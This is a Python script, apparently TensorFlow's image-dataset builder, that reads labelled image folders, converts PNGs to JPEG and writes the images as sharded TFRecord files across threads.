def _convert_to_example(filename, image_buffer, label, text, height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
text: string, unique human-readable, e.g. 'dog'
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
colorspace = 'RGB'
channels = 3
image_format = 'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(tf.compat.as_bytes(colorspace)),
'image/channels': _int64_feature(channels),
'image/class/label': _int64_feature(label),
'image/class/text': _bytes_feature(tf.compat.as_bytes(text)),
'image/format': _bytes_feature(tf.compat.as_bytes(image_format)),
'image/filename': _bytes_feature(tf.compat.as_bytes(os.path.basename(filename))),
'image/encoded': _bytes_feature(tf.compat.as_bytes(image_buffer))}))
return example
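# Illustrative only (not part of the original script): a minimal sketch of the
# inverse operation, parsing one serialized Example back into tensors using the
# same feature keys written by _convert_to_example above.
def _parse_example(serialized_example):
  """Parse a serialized Example proto produced by _convert_to_example."""
  feature_map = {
      'image/encoded': tf.FixedLenFeature([], dtype=tf.string),
      'image/class/label': tf.FixedLenFeature([], dtype=tf.int64),
      'image/class/text': tf.FixedLenFeature([], dtype=tf.string),
      'image/height': tf.FixedLenFeature([], dtype=tf.int64),
      'image/width': tf.FixedLenFeature([], dtype=tf.int64),
  }
  features = tf.parse_single_example(serialized_example, feature_map)
  # Decode the JPEG bytes back into an HxWx3 uint8 tensor.
  image = tf.image.decode_jpeg(features['image/encoded'], channels=3)
  return image, features['image/class/label']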
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
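# Illustrative only: typical use of ImageCoder (one instance shared per worker thread):
#   coder = ImageCoder()
#   with tf.gfile.FastGFile('/path/to/image.jpg', 'rb') as f:  # hypothetical path
#     image = coder.decode_jpeg(f.read())                      # -> HxWx3 uint8 array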
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
return filename.endswith('.png')
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
with tf.gfile.FastGFile(filename, 'rb') as f:
image_data = f.read()
  # Convert any PNG to JPEG for consistency.
if _is_png(filename):
print('Converting PNG to JPEG for %s' % filename)
image_data = coder.png_to_jpeg(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
  # Check that the image was converted to RGB.
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
texts, labels, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
    thread_index: integer, unique index of the batch to run, within [0, len(ranges)).
    ranges: list of pairs of integers specifying the range of files each batch
      analyzes in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
  # Each thread produces N shards where N = int(num_shards / num_threads).
  # For instance, if num_shards = 128 and num_threads = 2, then the first
  # thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
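  # shard_ranges splits this thread's slice of files into num_shards_per_batch
  # contiguous, roughly equal chunks; chunk s becomes output shard
  # thread_index * num_shards_per_batch + s.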
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in range(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
text = texts[i]
try:
image_buffer, height, width = _process_image(filename, coder)
except Exception as e:
print(e)
print('SKIPPED: Unexpected error while decoding %s.' % filename)
continue
example = _convert_to_example(filename, image_buffer, label,
text, height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, texts, labels, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(texts)
assert len(filenames) == len(labels)
  # Break all images into batches, each covering the half-open range
  # [ranges[i][0], ranges[i][1]).
spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(np.int)
ranges = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
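  # For example (illustrative numbers): with 10 files and num_threads = 2,
  # spacing = [0, 5, 10] and ranges = [[0, 5], [5, 10]].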
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in range(len(ranges)):
args = (coder, thread_index, ranges, name, filenames,
texts, labels, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the image data set resides in JPEG files located in
the following directory structure.
data_dir/dog/another-image.JPEG
data_dir/dog/my-image.jpg
where 'dog' is the label associated with these images.
labels_file: string, path to the labels file.
The list of valid labels are held in this file. Assumes that the file
contains entries as such:
dog
cat
flower
where each line corresponds to a label. We map each label contained in
the file to an integer starting with the integer 0 corresponding to the
label contained in the first line.
Returns:
filenames: list of strings; each string is a path to an image file.
texts: list of strings; each string is the class, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth.
"""
print('Determining list of input files and labels from %s.' % data_dir)
unique_labels = [l.strip() for l in tf.gfile.FastGFile(
labels_file, 'r').readlines()]
labels = []
filenames = []
texts = []
# Leave label index 0 empty as a background class.
label_index = 1
# Construct the list of JPEG files and labels.
for text in unique_labels:
jpeg_file_path = '%s/%s/*' % (data_dir, text)
matching_files = tf.gfile.Glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
texts.extend([text] * len(matching_files))
filenames.extend(matching_files)
if not label_index % 100:
      print('Finished finding files in %d of %d classes.' % (
          label_index, len(unique_labels)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = list(range(len(filenames)))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
texts = [texts[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(unique_labels), data_dir))
return filenames, texts, labels
def _process_dataset(name, directory, num_shards, labels_file):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
labels_file: string, path to the labels file.
"""
filenames, texts, labels = _find_image_files(directory, labels_file)
_process_image_files(name, filenames, texts, labels, num_shards)
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.validation_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
'FLAGS.validation_shards')
print('Saving results to %s' % FLAGS.output_directory)
# Run it!
_process_dataset('validation', FLAGS.validation_directory,
FLAGS.validation_shards, FLAGS.labels_file)
_process_dataset('train', FLAGS.train_directory,
FLAGS.train_shards, FLAGS.labels_file)
if __name__ == '__main__':
tf.app.run()
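# Example invocation (paths and labels file are placeholders, adjust to your data;
# train_shards and validation_shards must be divisible by num_threads):
#   python build_image_data.py --train_directory=/tmp/train \
#     --validation_directory=/tmp/validation --output_directory=/tmp/records \
#     --labels_file=/tmp/labels.txt --train_shards=2 --validation_shards=2 \
#     --num_threads=2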
|